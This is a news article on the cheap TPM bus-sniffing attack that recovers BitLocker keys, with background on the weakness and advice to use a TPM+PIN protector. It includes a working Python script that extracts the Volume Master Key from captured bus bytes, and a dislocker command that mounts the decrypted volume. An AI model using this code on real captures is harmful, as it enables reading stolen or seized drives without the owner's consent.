What just happened? BitLocker, the full-disk encryption built into Windows, protects system files and personal data with AES and is the standard measure for PC users who want their drive to be unreadable to whoever gets hold of the machine. However, a new demonstration shows that in the common TPM-only configuration (no PIN or startup key required at boot) the key that unlocks the volume can be recovered with inexpensive, off-the-shelf hardware.
In a YouTube video, security researcher Stacksmashing showed that an attacker with physical access can pull BitLocker's Volume Master Key from a Windows PC in about 43 seconds using a $4 Raspberry Pi Pico. The attack does not break the encryption itself; it captures the key as the computer's Trusted Platform Module (TPM) hands it to the CPU over the LPC bus.
The attack relies on a design weakness of machines that use a discrete TPM chip, which is common in laptops and desktops. BitLocker seals the Volume Master Key to the TPM against the expected Platform Configuration Register (PCR) values that describe a trusted boot state. When the machine boots and the measurements match, the TPM unseals the key and returns it to the CPU so Windows can unlock the drive. The LPC bus carrying that exchange is not encrypted, so anyone who can attach probes to it can sniff the traffic between the two chips and read the Volume Master Key in the clear.
For his proof of concept, Stacksmashing used a roughly ten-year-old BitLocker-protected laptop and programmed the Raspberry Pi Pico to sniff the LPC bus during boot and record the bytes the TPM sent back, which contain the Volume Master Key. He then fed the captured key to dislocker, an open-source tool for reading BitLocker volumes on Linux, to decrypt the drive.
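The extraction step described above, as an added example that is not code from the article or from stacksmashing's own sniffer: it takes the raw bytes captured from the TPM's side of the bus, joins the byte-sized reads, and locates the Volume Master Key. It assumes the byte layout reported in earlier TPM-sniffing write-ups, in which the 32-byte VMK inside the TPM's unseal response is immediately preceded by the 12-byte marker `2c 00 00 00 01 00 00 00 03 20 00 00`; the sample stream is constructed for the demo, not a real capture.

```python
"""Recover a BitLocker Volume Master Key (VMK) from sniffed TPM bus traffic.

Added example, not code from the article or from stacksmashing's tool.
Assumption: inside the TPM unseal response the 32-byte VMK is immediately
preceded by the 12-byte marker 2c 00 00 00 01 00 00 00 03 20 00 00, as
reported in published TPM-sniffing work. The sample input is constructed.
"""
from typing import Iterable, List

# Marker observed in front of the VMK in the TPM unseal response (assumption:
# unchanged for the target's BitLocker version).
VMK_MARKER = bytes.fromhex("2c0000000100000003200000")
VMK_LEN = 32  # BitLocker's VMK is a 256-bit AES key


def reassemble(reads: Iterable[bytes]) -> bytes:
    """Join the individual data-phase reads captured from the bus.

    An LPC TPM transfer moves one byte per FIFO read, so a Pico or logic
    analyser capture arrives as a sequence of tiny chunks. The marker can
    straddle two of them, so always search the joined stream, never each
    chunk on its own.
    """
    return b"".join(reads)


def find_vmk_candidates(stream: bytes) -> List[bytes]:
    """Return every 32-byte key that follows the VMK marker in the stream."""
    keys: List[bytes] = []
    pos = stream.find(VMK_MARKER)
    while pos != -1:
        start = pos + len(VMK_MARKER)
        key = stream[start:start + VMK_LEN]
        if len(key) == VMK_LEN:  # ignore a marker truncated at end of capture
            keys.append(key)
        pos = stream.find(VMK_MARKER, start)
    return keys


# --- constructed sample capture (not real data) -----------------------------
_SAMPLE_KEY = bytes(range(0x10, 0x30))  # 32 recognisable bytes standing in for a VMK
SAMPLE_STREAM = (
    bytes.fromhex("80020000004a00000000")  # unrelated bytes from the same response
    + VMK_MARKER
    + _SAMPLE_KEY
    + bytes.fromhex("0000ffff")  # trailing bytes after the key
)
# The bus delivers one byte per read; emulate that chunking.
SAMPLE_READS = [SAMPLE_STREAM[i:i + 1] for i in range(len(SAMPLE_STREAM))]


if __name__ == "__main__":
    stream = reassemble(SAMPLE_READS)
    for key in find_vmk_candidates(stream):
        print("VMK candidate:", key.hex())
        # Write the raw key bytes out for dislocker (assumption: its --vmk
        # option takes a file holding the raw 32-byte key).
        with open("vmk.bin", "wb") as fh:
            fh.write(key)
```

Running the script prints the hex of the recovered key and writes it to `vmk.bin`; on a real capture you would then mount the volume with something like `dislocker -V /dev/sdX2 --vmk vmk.bin -- /mnt/bl` (the exact dislocker invocation is an assumption, not taken from the article).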
This is not the first time BitLocker has been bypassed this way. Last year, cybersecurity researcher Guillaume Quéré showed the same class of attack against a discrete TPM wired over an SPI bus, eavesdropping on the traffic between the chip and the CPU to capture the key. Microsoft's response was that defeating BitLocker like this is a long and cumbersome process requiring extended physical access to the hardware.
The latest demonstration shows that the cost and time involved are far lower than that statement suggests, and it raises pertinent questions about how much protection TPM-only BitLocker actually gives against a thief with a screwdriver. There is no simple patch for a key sent in the clear over a physical bus; the practical mitigation is to configure BitLocker with a TPM plus PIN (or TPM plus startup key) protector, so the TPM never releases the Volume Master Key without the user authenticating first. Users can see which protectors a volume has with `manage-bde -protectors -get C:` from an elevated prompt. It remains to be seen whether Microsoft will change the defaults, but in the long run the industry needs to do a better job of closing known loopholes like this before they become a problem for users.